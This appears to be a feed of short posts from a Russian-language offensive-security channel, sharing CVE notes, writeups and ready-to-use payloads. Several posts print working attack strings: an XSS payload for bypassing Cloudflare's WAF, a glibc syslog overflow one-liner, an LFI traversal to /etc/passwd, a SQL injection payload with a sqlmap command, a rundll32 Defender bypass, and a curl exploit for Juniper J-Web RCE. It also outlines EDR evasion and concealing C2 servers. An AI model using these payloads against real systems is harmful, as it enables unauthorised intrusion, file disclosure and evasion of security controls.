Linux Kernel Exploitation (свежая версия)
*
1 часть - Getting started & BOF
2 часть - Exploiting race-condition + UAF
3 часть - Heap techniques

#linux #kernel #hack

bypass XSS Cloudflare WAF

Encoded Payload
"><track/onerror='confirm\%601\%60'>

Clean Payload
"><track/onerror='confirm`1`'>

#CF #bypass

Docker 4 сыра дырки
writeup тут
а на видео видно как можно заюзать дырку в docker runc

#docker #escape

CVE-2023-6246:
Heap-based buffer overflow in the glibc's syslog

POC
(exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)

всем сегфолта )))))

Lenovo X1 Carbon Bitlocker Key Sniffing
круто, 42.9 секунды

Утры, как сами? Кофе, ? Давай два?)))

x4n4x security
тема
ты молодец ))))

внесем немного конкретики о пинах
BitLocker Key retrieval on a Windows 11, Lenovo X1 Carbon Gen 11 via SPI Sniffing.
То есть на задней стороне материнки, есть тестовые пады, секурненько )))
*
Да, это TPM 2.0
*
Ну и почитать TPM SNIFFING
#bitlocker #sniff

LFI
*
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

Pwning the Domain: Credentialess/Username
*
Большой и подробный ман от 7 февраля 2024
*
read

#redteam #win #pwn #cred

В поисках malware инфраструктуры
*
Если вам интересно как ищут всякие opedir, или C&C со всякими cobalt-strike, havoc или малварь вроде dark comet, то есть интересная статья, в статье 11 примеров на базе censys.
*
Исходя из статьи, можно немного прикрыть свой C2 от любопытных глаз
*
Tracking Malware Infrastructure

#malware #c2

Xbox ? PlayStation ?
No
Ubiquiti switch !

Bypassing SQL
*
payload:
8%20or%207250%3d0725
*
для sqlmap:
sqlmap -u 'http://OLOLO.com/anyfile.asp?id_test=8%20or%207250%3d07250' --dbs --random-agent ignore=500 - -code=200 -T tablename --columns -- no-cast
*

#sql #bypass

Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass.
*
то есть было и пофиксили:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
магия запятой:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)
собака старая, трюки новые.
CVE пока не имеет )

#defender #bypass

Свежая техника обхода EDR
Кому лень читать всю статью то: техника основана на запуске малвари ДО загрузки библиотеки DLL EDR.
Суть вот в чем, EDR должен внедрить свою DLL в каждый процесс, но если внедрять слишком рано - процесс крэшится, внедрять слишком поздно - так его уже малварь подчинила.
Суммируем: нужно найти момент для загрузки малвари ЧУТЬ раньше, при инициализации процесса - тогда EDR в лохматой жопе.
*
Статья - Bypassing EDRs With EDR-Preloading
Сорцы - EDR-Preloader

#EDR #malware

CVE-2023-36845 и CVE-2023-36846
Juniper Junos OS J-Web RCE
*
На все это дело есть и сплоит на питоне
но можно и в curlык
*

curl -kv "https ://OLOLO.com/about.php? PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

Грязный BASH
однострочник для быстрого обнаружения XSS в файлах PHP
*
rg --no-heading "echo.*\\\$_GET" | grep "\.php:" | grep -v -e "(\$_GET" -e "( \$_GET" -e "esc_" -e "admin_url" -e "(int)" -e htmlentities

Прощай NGINX
*
ESXI умер пару дней назад
теперь и NGINX умер
Глав разраб форкнул проект и теперь будет FreeNginx
Почитайте письмо, как эффективные манагеры в очередной раз все обосрали
https://freenginx.org/pipermail/nginx/2024-February/000000.html
*
В AUR уже что то появилось

#fuck

CVE-2024-21413
Expect Script POC
*
Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5
*
Link

Living off the False Positive
*
Полезное.
Ну прям всем хорошо, blue team могут использовать для настройки своей логики обнаружения вторжений, а red team научиться сливаться с серой массой.
LoFP

KeyTrap in DNS (CVE-2023-50387)
*
Link